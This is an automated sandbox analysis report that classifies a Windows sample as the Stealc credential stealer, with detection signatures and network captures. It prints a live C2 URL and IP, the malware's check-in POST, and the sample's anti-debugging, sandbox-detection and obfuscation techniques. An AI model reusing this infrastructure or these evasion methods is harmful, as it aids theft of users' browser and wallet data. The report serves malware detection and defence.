
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1525809
MD5: 8baeb58f65c1b9077a14792bd25a17f3
SHA1: 9908569a2920d3693bb0eba3692c48132a5b25a9
SHA256: f9c5550df902ffa0b701eb230cb26c712d35688efcae92636488915de920c6a8
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 2552 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8BAEB58F65C1B9077A14792BD25A17F3)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1586910979.00000000053C0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 2552 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 2552 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.ee0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma rules: No Sigma rule has matched

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-10-04T16:38:40.006563+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49706 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.ee0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49706 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 34 42 42 33 31 42 36 44 44 38 31 32 36 33 38 30 30 30 39 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 2d 2d 0d 0a Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="hwid"5D4BB31B6DD81263800096------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build"doma------HDBGDHDAECBGDHJKFIDG--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 34 42 42 33 31 42 36 44 44 38 31 32 36 33 38 30 30 30 39 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 2d 2d 0d 0a Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="hwid"5D4BB31B6DD81263800096------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build"doma------HDBGDHDAECBGDHJKFIDG--
Source: file.exe, 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1627926455.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1627926455.00000000016CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1627926455.00000000016CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1627926455.00000000016B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpW
Source: file.exe, 00000000.00000002.1627926455.00000000016B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AC9D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C282D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AA0F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011DF0C6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01297ACF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C6506
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011B2504
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AF591
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012B0C1D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0126475C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AD7A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011FCF86
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01223FE7
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00EE45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: aufxidhi ZLIB complexity 0.9946545738462714
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe, 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1586910979.00000000053C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ELOEFHSH.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 44%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1831424 > 1048576
Source: file.exe | Static PE information: Raw size of aufxidhi is bigger than: 0x100000 < 0x199000

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.ee0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;aufxidhi:EW;uxstyozv:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;aufxidhi:EW;uxstyozv:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cee72 should be: 0x1c011f
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: aufxidhi
Source: file.exe | Static PE information: section name: uxstyozv
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0133C926 push 54677472h; mov dword ptr [esp], esp | 0_2_0133C961
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0136212C push 6346F372h; mov dword ptr [esp], esi | 0_2_01362696
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0138B103 push 3B3B88F1h; mov dword ptr [esp], esp | 0_2_0138B14C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0138B103 push 385555A1h; mov dword ptr [esp], esp | 0_2_0138B1A3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139C975 push edi; mov dword ptr [esp], 5342B025h | 0_2_0139C985
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0139C975 push ecx; mov dword ptr [esp], 2341E4E6h | 0_2_0139D4E3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0137E952 push ecx; mov dword ptr [esp], eax | 0_2_0137E912
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013B3953 push ecx; mov dword ptr [esp], eax | 0_2_013B3A4D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013B3953 push edi; mov dword ptr [esp], esp | 0_2_013B3B69
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01571194 push 2A3EE55Fh; mov dword ptr [esp], ebx | 0_2_015711C1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01571194 push 79C3A7A1h; mov dword ptr [esp], ebx | 0_2_01571208
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01571194 push ecx; mov dword ptr [esp], edx | 0_2_01571250
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01571194 push ebx; mov dword ptr [esp], ebp | 0_2_015712EA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013979F0 push eax; mov dword ptr [esp], ecx | 0_2_01397A3D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0131F9FD push 650C16C7h; mov dword ptr [esp], ebx | 0_2_0131FA58
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0131F9FD push ebx; mov dword ptr [esp], eax | 0_2_0131FA87
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0131F9FD push ebx; mov dword ptr [esp], esp | 0_2_0131FAF8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EFB035 push ecx; ret | 0_2_00EFB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012F59C1 push 3BFEB407h; mov dword ptr [esp], esi | 0_2_012F59ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AC9D0 push ebx; mov dword ptr [esp], 4D8D1637h | 0_2_012ACB21
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AC9D0 push 142B6EF9h; mov dword ptr [esp], eax | 0_2_012ACB43
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AC9D0 push 2DC613C0h; mov dword ptr [esp], eax | 0_2_012ACB7D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AC9D0 push ecx; mov dword ptr [esp], ebp | 0_2_012ACBB3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AC9D0 push eax; mov dword ptr [esp], esi | 0_2_012ACBD2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AC9D0 push esi; mov dword ptr [esp], edi | 0_2_012ACC6C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AC9D0 push 65A50FB0h; mov dword ptr [esp], eax | 0_2_012ACC9E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AC9D0 push 2B254463h; mov dword ptr [esp], eax | 0_2_012ACD5A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AC9D0 push 4E286976h; mov dword ptr [esp], ebx | 0_2_012ACDAB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AC9D0 push eax; mov dword ptr [esp], edi | 0_2_012ACE35
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AC9D0 push 419DC912h; mov dword ptr [esp], ecx | 0_2_012ACE44
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012AC9D0 push ebx; mov dword ptr [esp], ecx | 0_2_012ACE61
Source: file.exe | Static PE information: section name: aufxidhi entropy: 7.9520679718814815

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13624
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11420F8 second address: 11420FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A8117 second address: 12A811B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A811B second address: 12A812A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF8E8F833B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A812A second address: 12A8139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FF8E8F8DBB6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BAA11 second address: 12BAA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BABA3 second address: 12BABAC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BAD7D second address: 12BAD9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF8E8F833BFh 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007FF8E8F833B6h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BAD9B second address: 12BADA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BAED5 second address: 12BAEDF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BAEDF second address: 12BAEF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC4h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BAEF9 second address: 12BAF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8E8F833BAh 0x00000009 jmp 00007FF8E8F833BAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BAF11 second address: 12BAF15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BB19E second address: 12BB1A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BB2FC second address: 12BB329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007FF8E8F8DBBEh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF8E8F8DBC4h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12BCD6B second address: 12BCDCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF8E8F833BCh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jc 00007FF8E8F833CEh 0x0000001a jmp 00007FF8E8F833C8h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FF8E8F833C4h 0x00000026 rdtsc
